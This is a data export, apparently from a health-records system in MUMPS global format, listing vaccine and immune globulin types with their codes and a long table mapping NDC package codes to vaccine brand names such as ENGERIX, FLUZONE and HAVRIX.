INFLUENZA, INJECTABLE, MDCK, PF^FLU-ccIIV3^153^^^^1^0^10^^90661^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3140819^^^^1
"DATA",9002084.94,257,1)
Flucelvax^^^^^^^^^^^^^Influenza, injectable, Madin Darby Canine Kidney, preservative free
"DATA",9002084.94,258,0)
HEP A, IG^HEP A,IG^154^^^^1^0^9^^^^^^^^1
"DATA",9002084.94,258,1)
^^^^^^^^^^^^^Hepatitis A immune globulin
"DATA",9002084.94,259,0)
INFLUENZA, INJECTABLE, RECOMB, PF^FLU-RIV3^155^^^^1^0^10^^90673^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3140819
"DATA",9002084.94,259,1)
FluBlok^^^^^^^^^^^^^Seasonal, trivalent, recombinant, injectable influenza, preservative free
"DATA",9002084.94,260,0)
INFLUENZA, Injectable, Quadravalent^FLU-IIV4^158^^^^1^0^10^^90688^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3140819^^^^1
"DATA",9002084.94,260,1)
FluLaval Quadrivalent^^^^^^^^^^^^^Influenza, injectable, quadrivalent
"DATA",9002084.94,261,0)
Rho(D)-IG^Rho(D)-IG^156^^^^1^0^12
"DATA",9002084.94,261,1)
^^^^^^^^^^^^^Rho(D) Immune globulin- IV or IM
"DATA",9002084.94,262,0)
Rho(D) -IG IM^Rho(D)IGIM^157^^^^1^^12
"DATA",9002084.94,262,1)
^^^^^^^^^^^^^Rho(D) Immune globulin - IM
"DATA",9002084.94,263,0)
Rho(D) - Unspecified formulation^Rho(D),NOS^159^^^^1^^12
"DATA",9002084.94,263,1)
^^^^^^^^^^^^^Rho(D) Unspecified formulation
"DATA",9002084.94,264,0)
Influenza A monovalent (H5N1), ADJUVANTED-2013^H5N1,adj^160^^^^1^0^10
"DATA",9002084.94,264,1)
^^^^^^^^^^^^^Influenza A monovalent (H5N1), adjuvanted, National stockpile 2013
"DATA",9002084.94,265,0)
Influenza, injectable,quadrivalent, preservative free, pediatric^FLU-PEDIV4^161^^^^0^0^10^^^15,16,88,111,123,125,126,127,128,135,140,141,144,149,150,151,153,155,158,161^3140819^^^0^1^.25
"DATA",9002084.94,265,1)
^^^^^^^^^^^^^Influenza, injectable,quadrivalent, preservative free, pediatric
"DATA",9002084.95,1,0)
00006-4011-00^117^128^M-M-R^^0
"DATA",9002084.95,2,0)
00006-4681-00^117^128^M-M-R^^0
"DATA",9002084.95,3,0)
00006-4589-00^111^128^ATTENUVAX^^0
"DATA",9002084.95,4,0)
00006-4614-00^111^128^ATTENUVAX^^0
"DATA",9002084.95,5,0)
00006-4505-00^111^128^ATTENUVAX^^0
"DATA",9002084.95,6,0)
00006-4061-47^111^128^ATTENUVAX^^0
"DATA",9002084.95,7,0)
00006-4062-00^111^128^ATTENUVAX^^0
"DATA",9002084.95,8,0)
00006-4019-00^114^128^MERUVAX^^0
"DATA",9002084.95,9,0)
00006-4027-00^114^128^MERUVAX^^0
"DATA",9002084.95,10,0)
00006-4028-15^114^128^MERUVAX^^0
"DATA",9002084.95,11,0)
00006-4675-00^114^128^MERUVAX^^0
"DATA",9002084.95,12,0)
00006-4674-00^114^128^MERUVAX^^0
"DATA",9002084.95,13,0)
00006-4673-00^114^128^MERUVAX^^0
"DATA",9002084.95,14,0)
00006-4017-00^114^128^MERUVAX^^0
"DATA",9002084.95,15,0)
00006-4028-00^114^128^MERUVAX^^0
"DATA",9002084.95,16,0)
00006-4593-00^115^128^MUMPSVAX^^0
"DATA",9002084.95,17,0)
00006-4664-00^115^128^MUMPSVAX^^0
"DATA",9002084.95,18,0)
00006-4584-00^115^128^MUMPSVAX^^0
"DATA",9002084.95,19,0)
00006-4232-00^115^128^MUMPSVAX^^0
"DATA",9002084.95,20,0)
00006-4063-00^115^128^MUMPSVAX^^0
"DATA",9002084.95,21,0)
58160-820-52^138^142^ENGERIX^^0
"DATA",9002084.95,22,0)
00006-4981-00^138^128^RECOMBIVAX^^0
"DATA",9002084.95,23,0)
00007-0856-58^138^142^ENGERIX^^0
"DATA",9002084.95,24,0)
58160-820-01^138^142^ENGERIX^^0
"DATA",9002084.95,25,0)
58160-820-11^138^142^ENGERIX^^0
"DATA",9002084.95,26,0)
58160-820-32^138^142^ENGERIX^^0
"DATA",9002084.95,27,0)
58160-820-46^138^142^ENGERIX^^0
"DATA",9002084.95,28,0)
00007-0820-11^138^142^ENGERIX^^0
"DATA",9002084.95,29,0)
00007-0820-46^138^142^ENGERIX^^0
"DATA",9002084.95,30,0)
00007-0856-57^138^142^ENGERIX^^0
"DATA",9002084.95,31,0)
00007-0856-56^138^142^ENGERIX^^0
"DATA",9002084.95,32,0)
00007-0856-36^138^142^ENGERIX^^0
"DATA",9002084.95,33,0)
00007-0856-35^138^142^ENGERIX^^0
"DATA",9002084.95,34,0)
00007-0856-27^138^142^ENGERIX^^0
"DATA",9002084.95,35,0)
00007-0856-26^138^142^ENGERIX^^0
"DATA",9002084.95,36,0)
00007-0856-11^138^142^ENGERIX^^0
"DATA",9002084.95,37,0)
00007-0856-01^138^142^ENGERIX^^0
"DATA",9002084.95,38,0)
00007-0856-50^138^142^ENGERIX^^0
"DATA",9002084.95,39,0)
00007-0856-46^138^142^ENGERIX^^0
"DATA",9002084.95,40,0)
58160-856-46^138^142^ENGERIX^^0
"DATA",9002084.95,41,0)
58160-856-11^138^142^ENGERIX^^0
"DATA",9002084.95,42,0)
58160-856-01^138^142^ENGERIX^^0
"DATA",9002084.95,43,0)
00006-4875-00^138^128^RECOMBIVAX^^0
"DATA",9002084.95,44,0)
00007-0859-05^138^142^ENGERIX^^0
"DATA",9002084.95,45,0)
00007-0859-26^138^142^ENGERIX^^0
"DATA",9002084.95,46,0)
00007-0859-11^138^142^ENGERIX^^0
"DATA",9002084.95,47,0)
00007-0859-36^138^142^ENGERIX^^0
"DATA",9002084.95,48,0)
00007-0859-35^138^142^ENGERIX^^0
"DATA",9002084.95,49,0)
00006-4769-47^138^128^RECOMBIVAX^^0
"DATA",9002084.95,50,0)
00007-0859-27^138^142^ENGERIX^^0
"DATA",9002084.95,51,0)
58160-820-51^138^142^ENGERIX^^0
"DATA",9002084.95,52,0)
17478-130-10^102^^TETANUS AND DIPHTHERIA TOXOIDS ADSORBED^^0
"DATA",9002084.95,53,0)
14362-0111-5^102^^TD^^0
"DATA",9002084.95,54,0)
14362-0111-1^102^^TD^^0
"DATA",9002084.95,55,0)
00064-133-41^102^^TD^^0
"DATA",9002084.95,56,0)
49281-860-51^107^137^IPOL^^0
"DATA",9002084.95,57,0)
14645-860-51^107^137^IPOL^^0
"DATA",9002084.95,58,0)
14645-860-52^107^137^IPOL^^0
"DATA",9002084.95,59,0)
14645-860-10^107^137^IPOL^^0
"DATA",9002084.95,60,0)
14645-860-55^107^137^IPOL^^0
"DATA",9002084.95,61,0)
49281-860-55^107^137^IPOL^^0
"DATA",9002084.95,62,0)
49281-860-52^107^137^IPOL^^0
"DATA",9002084.95,63,0)
49281-860-10^107^137^IPOL^^0
"DATA",9002084.95,64,0)
00005-1970-65^142^146^PREVNAR^^0
"DATA",9002084.95,65,0)
00005-1970-50^142^146^PREVNAR^^0
"DATA",9002084.95,66,0)
00005-1970-21^142^146^PREVNAR^^0
"DATA",9002084.95,67,0)
00005-1970-26^142^146^PREVNAR^^0
"DATA",9002084.95,68,0)
00005-1970-67^142^146^PREVNAR^^0
"DATA",9002084.95,69,0)
00005-1970-49^142^146^PREVNAR^^0
"DATA",9002084.95,70,0)
49281-790-51^207^137^TYPHIM^^0
"DATA",9002084.95,71,0)
49281-790-01^207^137^TYPHIM^^0
"DATA",9002084.95,72,0)
49281-790-20^207^137^TYPHIM^^0
"DATA",9002084.95,73,0)
00007-0815-46^209^142^TWINRIX^^0
"DATA",9002084.95,74,0)
00007-0815-11^209^142^TWINRIX^^0
"DATA",9002084.95,75,0)
58160-815-41^209^142^TWINRIX^^0
"DATA",9002084.95,76,0)
58160-815-11^209^142^TWINRIX^^0
"DATA",9002084.95,77,0)
58160-815-01^209^142^TWINRIX^^0
"DATA",9002084.95,78,0)
58160-815-46^209^142^TWINRIX^^0
"DATA",9002084.95,79,0)
58160-815-48^209^142^TWINRIX^^0
"DATA",9002084.95,80,0)
58160-850-11^209^142^TWINRIX^^0
"DATA",9002084.95,81,0)
58160-815-52^209^142^TWINRIX^^0
"DATA",9002084.95,82,0)
58160-850-46^209^142^TWINRIX^^0
"DATA",9002084.95,83,0)
00007-0850-01^209^142^TWINRIX^^0
"DATA",9002084.95,84,0)
00007-0850-11^209^142^TWINRIX^^0
"DATA",9002084.95,85,0)
49281-286-05^211^137^DAPTACEL^^0
"DATA",9002084.95,86,0)
11793-2861-0^211^137^DAPTACEL^^0
"DATA",9002084.95,87,0)
11793-2860-1^211^137^DAPTACEL^^0
"DATA",9002084.95,88,0)
11793-2860-5^211^137^DAPTACEL^^0
"DATA",9002084.95,89,0)
49281-286-10^211^137^DAPTACEL^^0
"DATA",9002084.95,90,0)
49281-286-01^211^137^DAPTACEL^^0
"DATA",9002084.95,91,0)
58160-811-52^216^142^PEDIARIX^^0
"DATA",9002084.95,92,0)
00007-0841-50^216^142^PEDIARIX^^0
"DATA",9002084.95,93,0)
58160-811-51^216^142^PEDIARIX^^0
"DATA",9002084.95,94,0)
58160-811-46^216^142^PEDIARIX^^0
"DATA",9002084.95,95,0)
58160-811-41^216^142^PEDIARIX^^0
"DATA",9002084.95,96,0)
58160-811-11^216^142^PEDIARIX^^0
"DATA",9002084.95,97,0)
58160-811-01^216^142^PEDIARIX^^0
"DATA",9002084.95,98,0)
00007-0811-46^216^142^PEDIARIX^^0
"DATA",9002084.95,99,0)
00007-0811-11^216^142^PEDIARIX^^0
"DATA",9002084.95,100,0)
58160-841-57^216^142^PEDIARIX^^0
"DATA",9002084.95,101,0)
00007-0841-56^216^142^PEDIARIX^^0
"DATA",9002084.95,102,0)
00007-0841-57^216^142^PEDIARIX^^0
"DATA",9002084.95,103,0)
58160-841-11^216^142^PEDIARIX^^0
"DATA",9002084.95,104,0)
58160-841-46^216^142^PEDIARIX^^0
"DATA",9002084.95,105,0)
58160-841-41^216^142^PEDIARIX^^0
"DATA",9002084.95,106,0)
58160-841-01^216^142^PEDIARIX^^0
"DATA",9002084.95,107,0)
58160-0811-52^216^142^PEDIARIX^^0
"DATA",9002084.95,108,0)
00007-0841-11^216^142^PEDIARIX^^0
"DATA",9002084.95,109,0)
00007-0841-46^216^142^PEDIARIX^^0
"DATA",9002084.95,110,0)
58160-841-50^216^142^PEDIARIX^^0
"DATA",9002084.95,111,0)
58160-841-56^216^142^PEDIARIX^^0
"DATA",9002084.95,112,0)
66019-106-11^217^125^FLUMIST^^0
"DATA",9002084.95,113,0)
66019-107-01^217^125^FLUMIST^^0
"DATA",9002084.95,114,0)
66019-106-01^217^125^FLUMIST^^0
"DATA",9002084.95,115,0)
66019-108-10^217^125^FLUMIST^^0
"DATA",9002084.95,116,0)
66019-105-11^217^125^FLUMIST^^0
"DATA",9002084.95,117,0)
49281-291-83^219^137^DECAVAC^^0
"DATA",9002084.95,118,0)
14362-0111-3^219^^TD^^0
"DATA",9002084.95,119,0)
17478-131-01^219^^TD PRESERVATIVE FREE^^0
"DATA",9002084.95,120,0)
49281-291-10^219^137^DECAVAC^^0
"DATA",9002084.95,121,0)
49281-589-01^220^137^MENACTRA^^0
"DATA",9002084.95,122,0)
49281-589-05^220^137^MENACTRA^^0
"DATA",9002084.95,123,0)
58160-842-01^221^142^BOOSTRIX^^0
"DATA",9002084.95,124,0)
00007-0842-46^221^142^BOOSTRIX^^0
"DATA",9002084.95,125,0)
58160-842-51^221^142^BOOSTRIX^^0
"DATA",9002084.95,126,0)
58160-0842-52^221^142^BOOSTRIX^^0
"DATA",9002084.95,127,0)
49281-400-10^221^137^ADACEL^^0
"DATA",9002084.95,128,0)
49281-400-15^221^137^ADACEL^^0
"DATA",9002084.95,129,0)
49281-400-05^221^137^ADACEL^^0
"DATA",9002084.95,130,0)
11793-4000-5^221^137^ADACEL^^0
"DATA",9002084.95,131,0)
11793-4001-0^221^137^ADACEL^^0
"DATA",9002084.95,132,0)
00007-0842-41^221^142^BOOSTRIX^^0
"DATA",9002084.95,133,0)
00007-0842-11^221^142^BOOSTRIX^^0
"DATA",9002084.95,134,0)
00007-0842-01^221^142^BOOSTRIX^^0
"DATA",9002084.95,135,0)
58160-842-46^221^142^BOOSTRIX^^0
"DATA",9002084.95,136,0)
58160-842-41^221^142^BOOSTRIX^^0
"DATA",9002084.95,137,0)
58160-842-11^221^142^BOOSTRIX^^0
"DATA",9002084.95,138,0)
00006-4047-01^222^128^ROTATEQ^^0
"DATA",9002084.95,139,0)
00006-4047-31^222^128^ROTATEQ^^0
"DATA",9002084.95,140,0)
00006-4047-41^222^128^ROTATEQ^^0
"DATA",9002084.95,141,0)
58160-830-46^224^142^CERVARIX^^0
"DATA",9002084.95,142,0)
58160-830-11^224^142^CERVARIX^^0
"DATA",9002084.95,143,0)
58160-830-32^224^142^CERVARIX^^0
"DATA",9002084.95,144,0)
58160-805-01^225^142^ROTARIX^^0
"DATA",9002084.95,145,0)
58160-805-10^225^142^ROTARIX^^0
"DATA",9002084.95,146,0)
58160-805-11^225^142^ROTARIX^^0
"DATA",9002084.95,147,0)
58160-0854-52^225^142^ROTARIX LIVE ORAL^^0
"DATA",9002084.95,148,0)
49281-510-05^226^137^PENTACEL^^0
"DATA",9002084.95,149,0)
49281-510-10^226^137^PENTACEL^^0
"DATA",9002084.95,150,0)
00006-4963-41^227^128^ZOSTAVAX^^0
"DATA",9002084.95,151,0)
00006-4963-00^227^128^ZOSTAVAX^^0
"DATA",9002084.95,152,0)
00006-4963-01^227^128^ZOSTAVAX^^0
"DATA",9002084.95,153,0)
66019-0200-10^231^125^H1N1 INFLUENZA A^^0
"DATA",9002084.95,154,0)
49281-650-90^232^137^H1N1 INFLUENZA A^^0
"DATA",9002084.95,155,0)
49281-650-50^232^137^H1N1 INFLUENZA A^^0
"DATA",9002084.95,156,0)
49281-650-10^232^137^H1N1 INFLUENZA A^^0
"DATA",9002084.95,157,0)
49281-650-25^232^137^H1N1 INFLUENZA A^^0
"DATA",9002084.95,158,0)
33332-519-01^232^155^H1N1 INFLUENZA A^^0
"DATA",9002084.95,159,0)
49281-650-70^232^137^H1N1 INFLUENZA A^^0
"DATA",9002084.95,160,0)
66521-200-02^232^^H1N1 INFLUENZA A^^0
"DATA",9002084.95,161,0)
49281-640-15^233^137^H1N1 INFLUENZA A^^0
"DATA",9002084.95,162,0)
66521-200-10^233^^H1N1 INFLUENZA A^^0
"DATA",9002084.95,163,0)
33332-629-10^233^155^H1N1 INFLUENZA A^^0
"DATA",9002084.95,164,0)
19515-9886-07^233^142^H1N1 INFLUENZA A^^0
"DATA",9002084.95,165,0)
58160-812-51^230^142^KINRIX^^0
"DATA",9002084.95,166,0)
58160-812-11^230^142^KINRIX^^0
"DATA",9002084.95,167,0)
58160-812-46^230^142^KINRIX^^0
"DATA",9002084.95,168,0)
58160-812-52^230^142^KINRIX^^0
"DATA",9002084.95,169,0)
58160-812-41^230^142^KINRIX^^0
"DATA",9002084.95,170,0)
00005-1971-01^235^146^PREVNAR-13^^0
"DATA",9002084.95,171,0)
00005-1971-02^235^146^PREVNAR-13^^0
"DATA",9002084.95,172,0)
42515-001-01^240^^IXIARO^^0
"DATA",9002084.95,173,0)
49281-385-65^236^137^FLUZONE^^0
"DATA",9002084.95,174,0)
49281-387-65^236^137^FLUZONE^^0
"DATA",9002084.95,175,0)
46028-208-01^237^^MENVEO^^0
"DATA",9002084.95,176,0)
49281-010-25^242^137^FLUZONE^^0
"DATA",9002084.95,177,0)
49281-010-50^242^137^FLUZONE^^0
"DATA",9002084.95,178,0)
49281-010-10^242^137^FLUZONE^^0
"DATA",9002084.95,179,0)
33332-010-01^242^155^AFLURIA^^0
"DATA",9002084.95,180,0)
00007-0874-46^242^142^FLUARIX^^0
"DATA",9002084.95,181,0)
49281-007-25^242^137^FLUZONE^^0
"DATA",9002084.95,182,0)
49281-006-50^242^137^FLUZONE^^0
"DATA",9002084.95,183,0)
49281-007-50^242^137^FLUZONE^^0
"DATA",9002084.95,184,0)
49281-366-11^242^137^FLUZONE^^0
"DATA",9002084.95,185,0)
49281-370-11^242^137^FLUZONE^^0
"DATA",9002084.95,186,0)
49281-372-11^242^137^FLUZONE^^0
"DATA",9002084.95,187,0)
49281-371-25^242^137^FLUZONE^^0
"DATA",9002084.95,188,0)
49281-371-50^242^137^FLUZONE^^0
"DATA",9002084.95,189,0)
49281-373-25^242^137^FLUZONE^^0
"DATA",9002084.95,190,0)
49281-005-25^242^137^FLUZONE^^0
"DATA",9002084.95,191,0)
49281-005-50^242^137^FLUZONE^^0
"DATA",9002084.95,192,0)
49281-005-10^242^137^FLUZONE^^0
"DATA",9002084.95,193,0)
49281-007-10^242^137^FLUZONE^^0
"DATA",9002084.95,194,0)
49281-008-25^242^137^FLUZONE^^0
"DATA",9002084.95,195,0)
49281-008-10^242^137^FLUZONE^^0
"DATA",9002084.95,196,0)
49281-008-50^242^137^FLUZONE^^0
"DATA",9002084.95,197,0)
58160-875-46^242^142^FLUARIX^^0
"DATA",9002084.95,198,0)
58160-877-46^242^142^FLUARIX^^0
"DATA",9002084.95,199,0)
46028-108-01^242^^AGRIFLU^^0
"DATA",9002084.95,200,0)
58160-876-46^242^142^FLUARIX^^0
"DATA",9002084.95,201,0)
33332-009-01^242^155^AFLURIA^^0
"DATA",9002084.95,202,0)
49281-009-25^242^137^FLUZONE^^0
"DATA",9002084.95,203,0)
49281-009-50^242^137^FLUZONE^^0
"DATA",9002084.95,204,0)
49281-009-10^242^137^FLUZONE^^0
"DATA",9002084.95,205,0)
49281-384-15^243^137^FLUZONE^^0
"DATA",9002084.95,206,0)
66521-112-10^243^^FLUVIRIN^^0
"DATA",9002084.95,207,0)
33332-109-10^243^155^AFLURIA^^0
"DATA",9002084.95,208,0)
66521-112-02^243^^FLUVIRIN^^0
"DATA",9002084.95,209,0)
66521-113-02^243^^FLUVIRIN^^0
"DATA",9002084.95,210,0)
49281-386-15^243^137^FLUZONE^^0
"DATA",9002084.95,211,0)
33332-110-10^243^155^AFLURIA^^0
"DATA",9002084.95,212,0)
66521-113-10^243^^FLUVIRIN^^0
"DATA",9002084.95,213,0)
19515-887-07^243^142^FLULAVAL^^0
"DATA",9002084.95,214,0)
49281-380-15^243^137^FLUZONE^^0
"DATA",9002084.95,215,0)
19515-884-07^243^142^FLULAVAL^^0
"DATA",9002084.95,216,0)
49281-378-15^243^137^FLUZONE^^0
"DATA",9002084.95,217,0)
66521-110-10^243^^FLUVIRIN^^0
"DATA",9002084.95,218,0)
49281-366-15^243^137^FLUZONE^^0
"DATA",9002084.95,219,0)
66521-104-10^243^^FLUVIRIN^^0
"DATA",9002084.95,220,0)
66521-104-01^243^^FLUVIRIN^^0
"DATA",9002084.95,221,0)
66521-105-10^243^^FLUVIRIN^^0
"DATA",9002084.95,222,0)
66521-105-01^243^^FLUVIRIN^^0
"DATA",9002084.95,223,0)
49281-370-15^243^137^FLUZONE^^0
"DATA",9002084.95,224,0)
49281-372-15^243^137^FLUZONE^^0
"DATA",9002084.95,225,0)
66521-107-01^243^^FLUVIRIN^^0
"DATA",9002084.95,226,0)
66521-107-10^243^^FLUVIRIN^^0
"DATA",9002084.95,227,0)
66521-108-01^243^^FLUVIRIN^^0
"DATA",9002084.95,228,0)
49281-376-15^243^137^FLUZONE^^0
"DATA",9002084.95,229,0)
66521-109-10^243^^FLUVIRIN^^0
"DATA",9002084.95,230,0)
66521-109-01^243^^FLUVIRIN^^0
"DATA",9002084.95,231,0)
00007-0883-07^243^142^FLULAVAL^^0
"DATA",9002084.95,232,0)
66521-111-10^243^^FLUVIRIN^^0
"DATA",9002084.95,233,0)
49281-382-15^243^137^FLUZONE^^0
"DATA",9002084.95,234,0)
66521-111-02^243^^FLUVIRIN^^0
"DATA",9002084.95,235,0)
19515-885-07^243^142^FLULAVAL^^0
"DATA",9002084.95,236,0)
66521-111-01^243^^FLUVIRIN^^0
"DATA",9002084.95,237,0)
33332-008-01^243^155^AFLURIA^^0
"DATA",9002084.95,238,0)
33332-108-10^243^155^AFLURIA^^0
"DATA",9002084.95,239,0)
19515-886-07^243^142^FLULAVAL^^0
"DATA",9002084.95,240,0)
00007-0873-46^148^142^FLUARIX^^0
"DATA",9002084.95,241,0)
63851-501-01^150^^RABAVERT^^0
"DATA",9002084.95,242,0)
53905-501-01^150^^RABAVERT^^0
"DATA",9002084.95,243,0)
49281-250-51^150^137^IMOVAX^^0
"DATA",9002084.95,244,0)
49281-251-20^150^137^IMOVAX^^0
"DATA",9002084.95,245,0)
49281-250-10^150^137^IMOVAX^^0
"DATA",9002084.95,246,0)
14645-250-10^150^137^IMOVAX^^0
"DATA",9002084.95,247,0)
14645-250-51^150^137^IMOVAX^^0
"DATA",9002084.95,248,0)
11793-8802-1^116^137^BCG^^0
"DATA",9002084.95,249,0)
48642-9041-1^116^134^BCG^^0
"DATA",9002084.95,250,0)
00007-0840-01^133^142^INFANRIX^^0
"DATA",9002084.95,251,0)
58160-810-52^133^142^INFANRIX^^0
"DATA",9002084.95,252,0)
49281-298-05^133^137^TRIPEDIA^^0
"DATA",9002084.95,253,0)
49281-298-10^133^137^TRIPEDIA^^0
"DATA",9002084.95,254,0)
58160-810-51^133^142^INFANRIX^^0
"DATA",9002084.95,255,0)
58160-810-01^133^142^INFANRIX^^0
"DATA",9002084.95,256,0)
58160-810-41^133^142^INFANRIX^^0
"DATA",9002084.95,257,0)
58160-840-46^133^142^INFANRIX^^0
"DATA",9002084.95,258,0)
58160-840-11^133^142^INFANRIX^^0
"DATA",9002084.95,259,0)
58160-840-41^133^142^INFANRIX^^0
"DATA",9002084.95,260,0)
49281-282-15^133^137^TRIPEDIA^^0
"DATA",9002084.95,261,0)
58160-840-01^133^142^INFANRIX^^0
"DATA",9002084.95,262,0)
58160-810-11^133^142^INFANRIX^^0
"DATA",9002084.95,263,0)
58160-810-46^133^142^INFANRIX^^0
"DATA",9002084.95,264,0)
49281-288-05^133^137^TRIPEDIA^^0
"DATA",9002084.95,265,0)
00007-0840-50^133^142^INFANRIX^^0
"DATA",9002084.95,266,0)
00007-0840-11^133^142^INFANRIX^^0
"DATA",9002084.95,267,0)
49281-288-15^133^137^TRIPEDIA^^0
"DATA",9002084.95,268,0)
00006-4827-00^132^128^VARIVAX^^0
"DATA",9002084.95,269,0)
00006-4826-00^132^128^VARIVAX^^0
"DATA",9002084.95,270,0)
64678-211-05^153^127^BIOTHRAX^^0
"DATA",9002084.95,271,0)
58337-0003-1^154^110^VIVOTIF^^0
"DATA",9002084.95,272,0)
49281-278-10^123^137^DT^^0
"DATA",9002084.95,273,0)
14362-0119-1^156^123^CYTOGAM^^0
"DATA",9002084.95,274,0)
14362-3101-1^156^123^CYTOGAM^^0
"DATA",9002084.95,275,0)
59730-4203-1^129^^HEPATITIS^^0
"DATA",9002084.95,276,0)
59730-4202-1^129^^HEPATITIS^^0
"DATA",9002084.95,277,0)
49281-489-05^134^137^MENOMUNE^^0
"DATA",9002084.95,278,0)
49281-489-01^134^137^MENOMUNE^^0
"DATA",9002084.95,279,0)
49281-489-91^134^137^MENOMUNE^^0
"DATA",9002084.95,280,0)
00006-4741-00^119^128^PNEUMOVAX^^0
"DATA",9002084.95,281,0)
00006-4943-00^119^128^PNEUMOVAX^^0
"DATA",9002084.95,282,0)
00006-4741-16^119^128^PNEUMOVAX^^0
"DATA",9002084.95,283,0)
00006-4739-01^119^128^PNEUMOVAX^^0
"DATA",9002084.95,284,0)
00006-4739-00^119^128^PNEUMOVAX^^0
"DATA",9002084.95,285,0)
00006-4739-50^119^128^PNEUMOVAX^^0
"DATA",9002084.95,286,0)
49281-190-20^158^137^IMOGAM^^0
"DATA",9002084.95,287,0)
13533-618-10^158^152^HYPERRAB^^0
"DATA",9002084.95,288,0)
13533-618-02^158^152^HYPERRAB^^0
"DATA",9002084.95,289,0)
49281-820-10^104^137^TETANUS TOXOID ABSORBED AD^^0
"DATA",9002084.95,290,0)
14362-0118-2^159^123^ZOSTER^^0
"DATA",9002084.95,291,0)
14362-0118-1^159^123^ZOSTER^^0
"DATA",9002084.95,292,0)
49281-915-05^120^137^YF VAX^^0
"DATA",9002084.95,293,0)
49281-915-20^120^137^YF VAX^^0
"DATA",9002084.95,294,0)
49281-915-01^120^137^YF VAX^^0
"DATA",9002084.95,295,0)
49281-680-50^161^137^JE-VAX^^0
"DATA",9002084.95,296,0)
49281-680-20^161^137^JE-VAX^^0
"DATA",9002084.95,297,0)
49281-680-30^161^137^JE-VAX^^0
"DATA",9002084.95,298,0)
14645-790-51^163^137^TYPHIM^^0
"DATA",9002084.95,299,0)
14645-790-01^163^137^TYPHIM^^0
"DATA",9002084.95,300,0)
14645-790-20^163^137^TYPHIM^^0
"DATA",9002084.95,301,0)
14645-790-50^163^137^TYPHIM^^0
"DATA",9002084.95,302,0)
00006-4851-00^164^128^RECOMBIVAX^^0
"DATA",9002084.95,303,0)
00006-4874-00^164^128^RECOMBIVAX^^0
"DATA",9002084.95,304,0)
58160-821-11^144^142^ENGERIX^^0
"DATA",9002084.95,305,0)
00006-4995-41^144^128^RECOMBIVAX^^0
"DATA",9002084.95,306,0)
00006-4995-00^144^128^RECOMBIVAX^^0
"DATA",9002084.95,307,0)
58160-821-43^144^142^ENGERIX^^0
"DATA",9002084.95,308,0)
00007-0857-01^144^142^ENGERIX^^0
"DATA",9002084.95,309,0)
58160-821-48^144^142^ENGERIX^^0
"DATA",9002084.95,310,0)
58160-821-01^144^142^ENGERIX^^0
"DATA",9002084.95,311,0)
00006-4094-06^144^128^RECOMBIVAX^^0
"DATA",9002084.95,312,0)
00006-4094-09^144^128^RECOMBIVAX^^0
"DATA",9002084.95,313,0)
58160-821-31^144^142^ENGERIX^^0
"DATA",9002084.95,314,0)
58160-821-46^144^142^ENGERIX^^0
"DATA",9002084.95,315,0)
00007-0821-46^144^142^ENGERIX^^0
"DATA",9002084.95,316,0)
00006-4773-47^144^128^RECOMBIVAX^^0
"DATA",9002084.95,317,0)
00007-0862-01^144^142^ENGERIX^^0
"DATA",9002084.95,318,0)
58160-857-01^144^142^ENGERIX^^0
"DATA",9002084.95,319,0)
58160-857-16^144^142^ENGERIX^^0
"DATA",9002084.95,320,0)
58160-857-11^144^142^ENGERIX^^0
"DATA",9002084.95,321,0)
58160-821-52^144^142^ENGERIX B^^0
"DATA",9002084.95,322,0)
00007-0857-16^144^142^ENGERIX^^0
"DATA",9002084.95,323,0)
00007-0857-46^144^142^ENGERIX^^0
"DATA",9002084.95,324,0)
00007-0857-50^144^142^ENGERIX^^0
"DATA",9002084.95,325,0)
00007-0857-11^144^142^ENGERIX^^0
"DATA",9002084.95,326,0)
00007-0821-11^144^142^ENGERIX^^0
"DATA",9002084.95,327,0)
00005-0104-32^126^146^HIBTITER^^0
"DATA",9002084.95,328,0)
49281-545-10^136^137^ACTHIB^^0
"DATA",9002084.95,329,0)
49281-545-05^136^137^ACTHIB^^0
"DATA",9002084.95,330,0)
14645-408-10^136^137^ACTHIB^^0
"DATA",9002084.95,331,0)
58160-806-05^136^142^HIBERIX^^0
"DATA",9002084.95,332,0)
14645-545-05^136^137^ACTHIB^^0
"DATA",9002084.95,333,0)
00006-4897-00^127^128^PEDVAXHIB^^0
"DATA",9002084.95,334,0)
00006-4797-00^127^128^PEDVAXHIB^^0
"DATA",9002084.95,335,0)
49281-597-05^166^137^TRIHIBIT^^0
"DATA",9002084.95,336,0)
14645-597-05^166^137^ACTHIB^^0
"DATA",9002084.95,337,0)
14645-597-06^166^137^ACTHIB^^0
"DATA",9002084.95,338,0)
00006-4898-00^167^128^COMVAX^^0
"DATA",9002084.95,339,0)
00006-4849-00^167^128^COMVAX^^0
"DATA",9002084.95,340,0)
58160-835-02^168^142^HAVRIX^^0
"DATA",9002084.95,341,0)
58160-825-43^168^142^HAVRIX^^0
"DATA",9002084.95,342,0)
58160-835-46^168^142^HAVRIX^^0
"DATA",9002084.95,343,0)
58160-835-05^168^142^HAVRIX^^0
"DATA",9002084.95,344,0)
58160-835-01^168^142^HAVRIX^^0
"DATA",9002084.95,345,0)
58160-835-07^168^142^HAVRIX^^0
"DATA",9002084.95,346,0)
00007-0835-41^168^142^HAVRIX^^0
"DATA",9002084.95,347,0)
00007-0835-46^168^142^HAVRIX^^0
"DATA",9002084.95,348,0)
00007-0835-07^168^142^HAVRIX^^0
"DATA",9002084.95,349,0)
00007-0835-01^168^142^HAVRIX^^0
"DATA",9002084.95,350,0)
58160-835-11^168^142^HAVRIX^^0
"DATA",9002084.95,351,0)
00006-4841-00^168^128^VAQTA^^0
"DATA",9002084.95,352,0)
00006-4841-41^168^128^VAQTA^^0
"DATA",9002084.95,353,0)
58160-826-48^168^142^HAVRIX^^0
"DATA",9002084.95,354,0)
58160-826-11^168^142^HAVRIX^^0
"DATA",9002084.95,355,0)
58160-826-46^168^142^HAVRIX^^0
"DATA",9002084.95,356,0)
58160-826-41^168^142^HAVRIX^^0
"DATA",9002084.95,357,0)
00006-4096-06^168^128^VAQUTA^^0
"DATA",9002084.95,358,0)
58160-826-01^168^142^HAVRIX^^0
"DATA",9002084.95,359,0)
58160-835-41^168^142^HAVRIX^^0
"DATA",9002084.95,360,0)
00006-4045-00^178^128^GARDASIL^^0
"DATA",9002084.95,361,0)
00006-4045-41^178^128^GARDASIL^^0
"DATA",9002084.95,362,0)
00006-4045-01^178^128^GARDASIL^^0
"DATA",9002084.95,363,0)
00006-4045-11^178^128^GARDASIL^^0
